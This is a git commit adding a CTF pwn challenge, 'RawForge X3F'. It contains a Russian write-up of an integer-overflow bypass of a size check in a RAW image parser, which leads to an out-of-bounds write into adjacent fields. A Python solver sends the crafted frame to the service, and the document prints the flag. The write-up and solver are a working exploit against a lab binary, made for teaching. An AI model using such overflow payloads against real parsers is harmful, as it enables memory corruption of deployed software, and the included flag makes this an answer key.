Init. Commit

This commit is contained in:
Caplag
2026-09-17 00:50:07 +03:00
commit 880d8698d6
115 changed files with 7611 additions and 0 deletions
+42
View File
@@ -0,0 +1,42 @@
<h1 align="center">RawForge X3F</h1>
<p align="center">
<img src="https://img.shields.io/badge/category-PWN-blueviolet" alt="PWN"/>
<img src="https://img.shields.io/badge/difficulty-hard-critical" alt="hard"/>
</p>
RawForge X3F обрабатывает RAW-снимки с дронов. По ELF `rawforge-x3f` видно, что размер изображения проверяется через произведение размеров, а число записываемых samples берётся из другого поля. Если произведение переполнится, проверка пропустит запись, которая выйдет за границу массива.
## Решение
Кадр начинается с `X3F0`, затем идут четыре `u32 LE`: `cols`, `rows`, `chans`, `samples`. Сервис вычисляет `alloc = cols * rows * chans` в 32 битах и требует `alloc <= 8`. Потом без дополнительной проверки записывает `samples` 16-битных слов в `pixels[8]`.
Берём `cols = 0x40000001`, `rows = 4`, `chans = 1`:
$$0x40000001 \cdot 4 \bmod 2^{32} = 4.$$
Лимит соблюдён, хотя реальные размеры огромные. Теперь используем независимое поле `samples`, чтобы выйти из 16-байтного массива пикселей в соседние поля:
| Смещение от `pixels` | Поле | Значение |
|---:|---|---|
| 16 | `magic`, 8 байт | `0x5833464a4f423031` |
| 24 | `target`, 8 байт | `0x5845504f52542121` |
| 32 | `approved`, 4 байта | `0x584f4b21` |
Собираем 36 байт данных, то есть 18 samples:
```python
import struct
values = b"\x00" * 16
values += struct.pack("<QQI", 0x5833464a4f423031, 0x5845504f52542121, 0x584f4b21)
frame = b"X3F0" + struct.pack("<IIII", 0x40000001, 4, 1, 18) + values
```
Кадр занимает 56 байт, включая 20 байт заголовка. В `1) upload x3f frame` на запрос `frame bytes:` передаём строку `56`, затем на `payload:` отправляем все 56 байт без добавленного перевода строки. Ответ `decoded alloc_words=4 samples=18` подтверждает нужное расхождение. После этого `2) export processed inspection` видит подменённые поля задания и отдаёт флаг.
[Солвер](solve/solve.py).
## Флаг
`caplag{raw_dimensions_wrapped_the_sensor_job}`
@@ -0,0 +1,61 @@
#!/usr/bin/env python3
import argparse
import os
import socket
import struct
import subprocess
import sys
class Tube:
def __init__(self, sock=None, proc=None):
self.sock = sock
self.proc = proc
def recv(self, n=4096):
if self.sock:
return self.sock.recv(n)
return os.read(self.proc.stdout.fileno(), n)
def send(self, data):
if self.sock:
self.sock.sendall(data)
else:
os.write(self.proc.stdin.fileno(), data)
def sendline(self, data):
self.send(data + b"\n")
def recvuntil(self, marker):
out = b""
while marker not in out:
chunk = self.recv(1)
if not chunk:
raise EOFError(out)
out += chunk
return out
def symbol_value(binary, name):
out = subprocess.check_output(["readelf", "-sW", binary], text=True)
for line in out.splitlines():
fields = line.split()
if len(fields) >= 8 and fields[-1] == name:
return int(fields[1], 16)
raise RuntimeError(f"symbol not found: {name}")
def connect(args):
if args.local:
env = os.environ.copy()
env["CTF_FLAG"] = args.flag
proc = subprocess.Popen([args.binary], stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, env=env)
return Tube(proc=proc)
return Tube(sock=socket.create_connection((args.host, args.port), timeout=5))
def choose(io, value):
io.recvuntil(b">")
io.sendline(str(value).encode())
def words64(x): return struct.pack("<Q",x)
def main():
p=argparse.ArgumentParser(); p.add_argument("--host",default="127.0.0.1"); p.add_argument("--port",type=int,default=31347); p.add_argument("--local",action="store_true"); p.add_argument("--binary",default="../public/rawforge-x3f"); p.add_argument("--flag",default="caplag{raw_dimensions_wrapped_the_sensor_job}"); args=p.parse_args()
vals=b"\x00"*16+words64(0x5833464a4f423031)+words64(0x5845504f52542121)+struct.pack("<I",0x584f4b21)
samples=len(vals)//2
frame=b"X3F0"+struct.pack("<IIII",0x40000001,4,1,samples)+vals
io=connect(args); choose(io,1); io.recvuntil(b"frame bytes:"); io.sendline(str(len(frame)).encode()); io.recvuntil(b"payload:"); io.send(frame)
choose(io,2); data=io.recvuntil(b"}"); print(data[data.rfind(b"caplag{"):].decode())
if __name__=="__main__": sys.exit(main())